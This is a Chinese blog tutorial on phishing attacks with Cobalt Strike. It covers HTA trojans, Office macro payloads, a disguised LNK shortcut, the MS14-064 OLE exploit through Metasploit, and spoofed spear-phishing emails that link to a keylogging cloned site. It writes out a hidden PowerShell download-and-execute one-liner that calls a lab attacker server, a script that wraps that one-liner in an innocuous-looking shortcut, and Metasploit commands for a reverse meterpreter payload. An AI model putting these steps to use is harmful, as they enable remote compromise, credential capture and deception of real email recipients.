首页 > 其他分享 >内网渗透神器CobaltStrike之钓鱼攻击(六)

内网渗透神器CobaltStrike之钓鱼攻击(六)

时间:2022-11-22 17:00:56浏览次数:50  
标签:文件 钓鱼 192.168 神器 CobaltStrike CS powershell 邮件

一、HTA木马

简介

HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。就是一个html应用程序,双击就能运行

HTA木马一般配合网站克隆进行钓鱼攻击


步骤

生成HTML后门(HTA文件), 选择相应的监听器和模式,有三种模式,分别为PowershellVBAExecutable

Executable 将会在hta文件中内嵌一个PE文件
Powershell 将会在hta文件中内嵌一段Powershell代码
VBA 将会在hta文件中内嵌一段VBA代码

image-20221006215055595

image-20221006215143328

image-20221006220530926


将hta木马上传至服务器提供给用户下载, 返回木马的url路径

image-20221006225053815

image-20221006225147120


自行选择一个网站进行克隆, 并在attack选项处选择上传的HTA木马, 随后返回的钓鱼链接http://192.168.47.134:80/

image-20221006225540887

动画


受害机用浏览器访问钓鱼链接后, 网站会咨询用户是否下载木马文件, 若用户下载且运行, 则用户在CS上线

动画


二、Office宏木马

简介

office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行


步骤

首先安装wps的宏插件, 不然无法在wps文档插入宏代码

image-20221006210722868


在攻击选项选择MS Office Macro生成恶意宏代码

img

img


打开新建的doc文档, 在开发工具栏点击宏选项, 新建一个宏

img


将CS生成的宏代码复制至文档中, 然后将文件类型保存为docm类型

img

img


三、LINK钓鱼

简介

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令

例如创建一个简单的powershell文件, 先创建一个txt文件, 并对其写入如下代码, 随后将其后缀名改为ps1, 右键单击此文件选择powershell执行, 运行后会弹出计算器

cmd /c calc.exe

1


步骤

选择钓鱼攻击>Scripted Web Delivery, 生成PowerShell远程执行代码

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

image-20221008093244770

image-20221008093510210


按照上面做的简单powershell步骤,将其内容里的calc.exe换成powershell代码, 保存为test.txt文件

cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"

image-20221008094547272


创建LNK.ps1文件, 将如下代码写入进去, 然后右键powershell执行后, 会在文件当前目录下生成test.lnk文件

若受害机运行了test.lnk文件, 则在CS上线

注意:LNK.ps1和test.txt要在同一目录下

$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ''+ $file
$Shortcut.Save()

四、OLE远程代码执行(MS14-064)

简介

Microsoft Windows OLE 远程代码执行漏洞,影响Win95+IE3 - Win10+IE11全版本

通过MSF生成恶意url连接, 配合CS克隆网站进行钓鱼攻击, 然后受害机在CS上线


准备环境

主机 描述
192.168.47.134(kali) CS服务器
192.168.47.144(kali) MSF
192.168.47.133(win7) CS客户端,攻击机
192.168.47.141(win7) 受害机

步骤

在kali上输入msfconsole打开metasploit, 再输入use exploit/windows/browser/ms14_064_ole_code_execution选择相应模块

然后输入如下命令开始执行攻击, 随后会返回一个url钓鱼连接:http://192.168.47.144:8080/lCKUuRHyz1

set srvhost 192.168.47.144 //设置msf服务器的ip

set srvport 8080  //设置恶意连接的访问端口

set payload windows/meterpreter/reverse_http  //设置监听协议

set allowpowershellprompt true  //使用powershell执行代码

set lhost 192.168.47.134  //设置监听服务器的ip

set lport 80  //设置监听服务器的端口

run  //开始执行

image-20221007163250674


在CS生成克隆网站, 攻击选项处填写刚生成的url钓鱼链接, 生成的克隆网站链接为http://192.168.47.134:80/baidu

image-20221007164045381

image-20221007164105955


受害机访问克隆网站后会弹出警告框, 询问你是否允许执行powershell, 若点击允许则在CS成功上线

2

image-20221007164633910


五、钓鱼邮件

简介

利用Cobalt Strike生成钓鱼邮件对企业或者网站的邮箱进行攻击, 钓鱼邮件的内容通常包含Office宏木马附件, 钓鱼网站等等

Cobalt Strike钓鱼邮件攻击需确定如下信息:

  • 目标邮箱
  • 邮件模板
  • smtp账号

步骤

首先确保你邮箱开启了SMTP服务,这里我以163邮箱为例, 需开启POP3/SMTP服务

1


开启了smtp服务后会自动生成一个授权密码, 在后面CS填写smtp信息会用到

image-20221007231641595


在网页邮箱可以查看邮件的模板, 将模板内容保存至Mail Template.txt文件

image-20221007232822248

image-20221007232952769


将目标邮箱以及收件人的信息保存在Mail.txt文件, 注意这两者之间相隔一个tab键的距离

image-20221007233150078


CS攻击选择邮件钓鱼

image-20221007233256046


填写钓鱼攻击所需的信息,在Mail Server的密码框要填写上面开启SMTP服务所生成的授权密码, 填写完毕后点击Send发送邮件

image-20221007234047285

Targets:存有目标邮箱及收件人信息的文本文件

Template:邮件模板文件

Attachment:附件

Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有键盘记录功能的克隆网站

Mail Server: 邮箱服务器相关信息

Bounce to:邮箱地址


接收到的钓鱼邮件显示的发件人是和原邮件一模一样的,且邮件的链接都被替换成了钓鱼链接

3


点击链接跳转至钓鱼页面,在输入框输入内容会被传输至CS服务器,可在CS客户端打开Web日志进行查看键盘记录

1

1

标签:文件,钓鱼,192.168,神器,CobaltStrike,CS,powershell,邮件
From: https://www.cnblogs.com/henry666/p/16915679.html

相关文章

  • 推荐一款高效率前端开发神器,功能太强大了 !
    当前端收到一张设计稿的时候,他们需要考虑非常多的问题。而第一个摆在面前的问题就是- ​​切图​​。作为连接设计师和前端的重要“纽带”,如果切图不准确,很容易导致最终的......
  • 码农必备?清华大学开源了一款写代码神器。。。
    程序员宝藏库:https://gitee.com/sharetech_lee/CS-Books-Store提升程序员编码效率,是一个经久不衰的话题,从最初用纯文本编辑器到后来代码自动补全,再到后来基于AI智能补......
  • 内网渗透神器CobaltStrike之会话管理(五)
    CS之间派生会话将CS1管理的会话派生至CS2中,简单来说就是将CS1服务器的肉鸡送给CS2服务器准备环境主机描述Kali(192.168.47.134)CSTeamServer1Kali2(19......
  • 发泄神器
     发泄神器android版一款娱乐发泄应用小软件,你是不是有很多讨厌的人,经常受到这些人的欺负,让你感到很压抑?压抑久了不好哦,心中是不是积蓄了很多怒火,发泄出来吧现在这款发泄......
  • Fiddler收费没得用?这款抓包神器 Github star 过万,一个字:香
    关于抓包,那是测试人员必备技能之一了,通常我们会通过一些抓包工具来辅助我们测试、定位bug。我最早接触并使用的就是fiddler,不过目前最新版本已经要开始付费了,以前很老的......
  • 工程师必备神器之批量命令生成器
    工具用途批量生成有规律的路由器、交换机命令,工程师只需将批量生成的命令,复制到CRT中执行即可,配置设备过程中有些繁琐的操作,今天可以通过我介绍的这个小工具来解决。适用......
  • 内网渗透神器CobaltStrike之Beacon详解(三)
    Beacon的种类HTTPBeacon和HTTPSBeacon这两个beacon的原理是通过发送http请求与受害主机通信来传达命令,以此实现控制效果优点是传输数据快,缺点时隐蔽性差,容易被......
  • 内网渗透神器CobaltStrike之重定向服务配置(二)
    重定向服务的概念"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器,不仅能保护CS服务器,还能增强与目标网络传输的稳定性,例如某一台重定向服务器倒塌了,......
  • CobaltStrike注入MSF会话
    声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关准备工作kali机开启CS服务器Win10开启msf、CS客户端Win7充当一台靶机  第一步:利用m......
  • CobaltStrike之信息收集
    声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关CobalitStrike简称CS,是一个渗透测试的利器,它可以被分为一个服务端和多个客户端,所以可以被用来......